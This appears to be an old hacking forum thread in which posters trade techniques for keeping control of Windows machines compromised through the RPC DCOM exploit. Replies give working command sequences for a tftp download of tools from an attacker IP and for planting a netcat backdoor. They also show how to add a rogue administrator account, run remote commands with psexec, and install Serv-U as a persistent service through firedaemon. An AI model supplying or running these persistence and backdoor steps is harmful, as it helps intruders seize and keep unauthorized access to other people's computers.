Well i have been in some of my own machines that have the rpc dcom exploit. Now is there a working DOS ftp or Dos trojan or something that lets me keep a machine after the dcom doesnt work. i've tried adding servudaemon to the startup folder in teh startmenu... not working... any help will be really apriciated on how you guys keep the comp, i think a dos ftp would be a great idea but cant find one. oh by the way when i try to run servudaemon from the command line, or almost any other server or trojan it says the application must be run under win32. thankyou

FOR EDUCATIONAL PURPOSES ONLY.

dont put servudaemon.exe in ure startup folder.. its useless

use the option servudaemon.exe /i (ofcourse @ the commandline)

(install servudaemon as service)

after this execute at the commandline:

net start serv-u

if everything went o.k u can type:

net start (now u will see a list of all the installed services on that pc including the servu service)

now servudaemon should be installed and running on the computer reboot after reboot after reboot

greetz flapz000r

Hi all, I'm new in this forum,
and I want to share my experinec with RPC DCOM Vulenrability.

I've seen that you succeeded in transfering file from you to/from victim computer.
How do you make this?

I' ve found the Universal Exploit,
coded by OC192 Group, and it works with my Italian version.

There are some point I' dlike to verify:

I can't execute any useful program.
When try toopen an ftp location from the hacked Computer (both the computers are of my property) it asks me userid and then it doens't ask me anything anymore.
The only thing I can do is to break the connection with CTR-X and CTR-C.
At that point, it is impossible to use the exploit until the victim computer is rebooted.

Now, For me and for my little knoledge is impossible to transfer files.
Can soemone tell me something more?
thanks ALL.

muttley i have an easy solution for you, on your windoze box, INSTALL A TFTP SERVER = ), and just follow the instructions, the most popular one is the one made by Solar Winds or something like that, just install it and run it, than when in someone elses command line this is the command...


tftp -i ipadress get filename destionationfilename
for example
tftp -i 69.69.69.69 get pr0n.exe pr0n.exe

that is one way, now people say you can also use raw ftp commands or a file to do all the commands, but i havent tried that, and the regular ftp kept freezing on me after typing in my username too.

yeah, as ssj4conejo said tftp is the way to go. the solar winds tftp server is around 7 mbs and has a simple gui and is efficient. tftp is just ftp implemented on udp, so there is no three-way handshake.
and remember to upload a backdoor before any thing else. use netcat with the -l switch for that enjoy

yes with universal.exe and solar winds tfp i can transfer files from and to the computer!
but i haven't found a way to execute a programm on the hacked machine.(only if i put it in the startmenu autorun folder, but thats a bit lame, cause it has to rebot first)
some one knows a way? please?

The first thing you should always do (incase you disconnect from the remote shell) is create an admin user. Type:

-----------------------------------------------------------------------------------------------

C:\WINNT\System32>net user [username] [password] /add

C:\WINNT\System32>net localgroup administrators [username] /add

-----------------------------------------------------------------------------------------------

After doing this type "net start" and see if Terminal Services is listed. If it is and the port has not been blocked by the firewall, then use remote desktop connection to connect to the computer with the [username] and [password] you supplied earlier. SIMPLE! It's as if you bought a new PC a couple of hundred miles away from you. If you get in then you "WILL" be able to execute servudaemon.exe!!!

If, however, the port is blocked then dont worry because there's always psexec to execute commands if you lose the shell. Download psexec from www.psutils.com and you can execute commands on the remote host like this:

-----------------------------------------------------------------------------------------------

C:\Windows\System32>psexec -u [username] -p [password] [command]

for example, if I created a user "Admin" with the password "12345" then another hacker would be able to hack this computer with IPC Scan. HAHA. Ok, dont pick a stupid password, but for arguments sakes, the command to open an interactive shell would be:

C:\Windows\System32>psexec -u Admin -p 12345 CMD

now for every line you would be typing in the remote shell do this:

C:\Windows\System32>psexec -u Admin -p 12345 "tftp -i 11.22.33.44 get servudaemon.exe"

C:\Windows\System32>psexec -u Admin -p 12345 "servudaemon /i"

etc.

-----------------------------------------------------------------------------------------------

Apart from all this to get back into the computer, to start the servu server after using the /i switch is:

-----------------------------------------------------------------------------------------------

C:\WINNT\System32>net start "serv-u ftp server"

-----------------------------------------------------------------------------------------------

If you cannot install serv-u as a system service with the "/i" parameter then use firedaemon. Upload it to the server's sytem32 dir along with the servudaemon executable and ini and type these commands:

-----------------------------------------------------------------------------------------------

C:\WINNT\System32>set MXHOME=%WINDIR%\System32

C:\WINNT\System32>set MXBIN=%MXHOME%

C:\WINNT\System32>firedaemon -i Serv-U "C:\WINNT\System32" "C:\WINNT\System32\ServUDaemon.exe" Y 0 0 0 Y

C:\WINNT\System32>net start Serv-U

-----------------------------------------------------------------------------------------------

Now, even if the computer (somehow - maybe if you amazingly managed to hack it whilst started up in dos) isn't running a win32 operating system, as soon as windows does start up, so will the serv-u ftp server.

Hey T3cHn0b0y, that's cool!

Do u think psexec can be run in computers withou admin privileges - such as in a cybercafe or something like that?

Thats for the info, m8!

dude............................... wake up!!!
... and get a grip on yourself

flap

ive been reaing alot of your post around the place and just let me say i dont like you.

you do nothing but bitnote yourself. people like you piss me off.
you a know everything know nothing kind of person.
i will personal make sure i dont help you whenever i can.

peace to all bar flap.
NetComm

Ok this all works on an NT Box
But if u try it on a XP Box
what do i have to do then